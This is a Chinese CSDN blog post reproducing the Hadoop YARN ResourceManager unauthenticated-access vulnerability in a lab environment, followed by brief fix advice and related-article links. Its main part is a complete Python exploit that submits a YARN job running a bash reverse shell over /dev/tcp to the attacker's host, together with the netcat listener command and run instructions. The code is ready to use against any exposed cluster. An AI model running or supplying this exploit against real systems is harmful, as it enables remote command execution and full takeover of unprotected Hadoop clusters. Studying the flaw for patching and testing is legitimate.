Hadoop 未授权访问漏洞复现

已于 2024-05-26 13:11:12 修改
阅读量561 收藏 8
点赞数 5
文章标签: hadoop 大数据 分布式
于 2024-05-26 11:04:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68581192/article/details/139195705
版权

Hadoop 未授权访问漏洞复现

1. 介绍
Hadoop是一个由 Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

2.漏洞复现
靶场IP:192.168.20.128
直接访问:192.168.20.128:8088/cluster/apps,如果页面返回如下则说明存在未授权访问漏洞在这里插入图片描述
官方exp反弹shell
需要修改target和lhost以及下面的端口号

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

打开监听:nc -lvvp 9999(任选一个未被占用的端口)
执行exp:python shell.py http://192.168.20.128:8088
在这里插入图片描述
成功反弹shell(如果没有反弹,可能需要关闭一下监听端的防火墙)
在这里插入图片描述

3.修复建议

  • 关闭Hadoop Web管理页面。
  • 开启身份验证,防止未授权用户访问。
  • 设置“安全组”访问控制策略,将Hadoop默认开放的多个端口对公网全部禁止或限制可信任的IP地址才能访问。
T大白兔奶糖
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 || Hadoop授权访问反弹Shell漏洞
失心少年
07-13 1128
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop 授权访问【原理扫描】及Apache Hadoop YARN 资源管理器 REST API授权访问漏洞【原理扫描】修复记录
萌兔兔MMQ!!
01-10 2993
Hadoop相关授权访问漏洞风险较高且使用hadoop的用户比较多,经常在安全检查用遇到这两个漏洞修复方法也就是按绿盟扫描器提供的方法: 一、对于Apache Hadoop YARN 资源管理器 REST API授权访问漏洞【原理扫描】: 方法1.在防火墙上设置“安全组”访问控制策略,将 HadoopWebUI(8088) 等相关端口限制可信任的 IP 地址才能访问。 方法22.将默认认证方法改为KerBeros认证。 但我目前遇到过的管理员没有愿意将hadoop采用KerBeros认证的,看了
Zookeeper授权访问测试问题
09-29
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。这篇文章主要介绍了Zookeeper授权访问测试,需要的朋友可以参考下
Hadoop-授权访问漏洞复现
weixin_42090431的博客
04-27 734
1、搭建环境 2、访问:http://your-ip:8088。3、EXP 监听9999端口。
Hadoop-yarn-授权访问漏洞
2301_76467680的博客
06-26 947
然后sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口。然后docker-compose up -d拉取环境。这个是exp写入靶场目录下的exploit.py里面。192.168.127.131:8088#执行exp。用whoami命令显示我们的权限为root。docker ps查看镜像是否启动。先进入vluhub里的靶场目录。然后虚拟机ip+端口去访问页面。就可以反弹shell了。
授权访问Hadoop 授权访问漏洞
qq_68163788的博客
05-20 970
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadopp授权访问导致RCE
qq_69775412的博客
01-25 858
Hadoop是一个开源的分布式计算框架,用于处理大规模数据集的存储和处理。它基于Google的MapReduce算法和Google File System(GFS)的论文,旨在提供一个可靠、可扩展、分布式存储和处理大规模数据的解决方案。漏洞产生原因:负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器。
Hadoop-yarn-授权访问漏洞
qq_42735101的博客
06-26 2045
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-授权访问漏洞复现
Hadoop YARN ResourceManager 授权访问漏洞复现
qq_39510388的博客
07-08 1423
Hadoop YARN ResourceManager 授权访问漏洞复现Vulhub官方复现教程漏洞原理复现过程 Vulhub官方复现教程 视频链接. 漏洞原理 http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - Hadoop safari - Hunting for vulnerabilities - v1.0.pdf 复现过程 这里使用的是vulhub提供的docker靶机 地址: https://vulhub.org/#/environme
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
修复hadoop漏洞 返回401漏洞
最新发布
06-28
修复hadoop漏洞 返回401漏洞
Teradata独创技术支持直接访问Hadoop
01-30
通过Teradata企业级Hadoop访问工具(TeradataEnterprise AccessforHadoop),帮助他们实现更快、更加明智的战略业务决策。作为Teradata统一数据架构(UDA)的重要组件,这项全新技术使业务分析师能够通过Teradata直接...
hadoop授权访问命令执行漏洞复现-vulfocus
c0529的博客
06-10 515
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现授权访问漏洞,可能允许经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了授权访问漏洞
Hadoop Yarn RPC授权访问漏洞_hadoop yarn授权访问漏洞修复如何开启身份验证(1)
2401_83947353的博客
04-17 537
Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以授权访问
Hadoop授权访问漏洞复现,阿里P8大佬亲自讲解
m0_61331367的博客
04-05 1038
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞复现Hadoop 授权访问到RCE
Fly_鹏程万里
06-20 75
Hadoop Hadoop是一个开源的分布式计算框架,用于存储和处理大规模数据集,它提供了可靠、可扩展和高性能的数据处理能力,使得用户可以在廉价的硬件集群上进行大数据处理和分析,Hadoop适用于处理大规模的结构化和非结构化数据并且在处理大数据集时具有良好的可扩展性和容错性,它被广泛应用于互联网公司、科学研究、金融行业等领域,用于大数据处理、日志分析、机器学习和数据挖掘等任务,而由于服务器直接在开放了Hadoop机器HDFS的50070 Web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,
hadoop授权访问
10-21
Hadoop授权访问指的是用户在尝试访问Hadoop集群资源时,授权的权限要求被拒绝。这可能是因为用户没有正确的用户名和密码,或者缺乏足够的权限来执行所需的操作。 要解决Hadoop授权访问的问题,可以采取以下步骤: 1. 检查用户名和密码:确保用于访问Hadoop集群的用户名和密码是正确的。如果是通过Web界面或API进行访问,确保输入的凭据是正确的,并且没有拼写错误。 2. 检查权限:查看用户是否具有执行所需操作的权限。Hadoop通常使用基于角色的访问控制(RBAC)来管理权限。确保用户被分配了正确的角色,并且角色具有所需的权限。 3. 检查防火墙设置:如果Hadoop集群位于防火墙后面,确保相应的端口已打开,以允许用户访问集群资源。 4. 检查配置文件:在Hadoop配置文件中,如core-site.xml和hdfs-site.xml,确保没有错误的配置或权限设置。验证这些文件中的配置是否正确,并根据需要进行修复。 5. 检查网络连接:确保用户的网络连接稳定,没有任何网络问题。如果网络连接不稳定,可能会导致Hadoop集群无法访问。 6. 检查Hadoop日志:查看Hadoop集群的日志,了解是否有关于访问被拒绝的错误消息。根据错误消息的提示,采取相应的措施来解决访问问题。 通过以上步骤,您应该能够解决Hadoop授权访问的问题,并成功访问和管理Hadoop集群资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值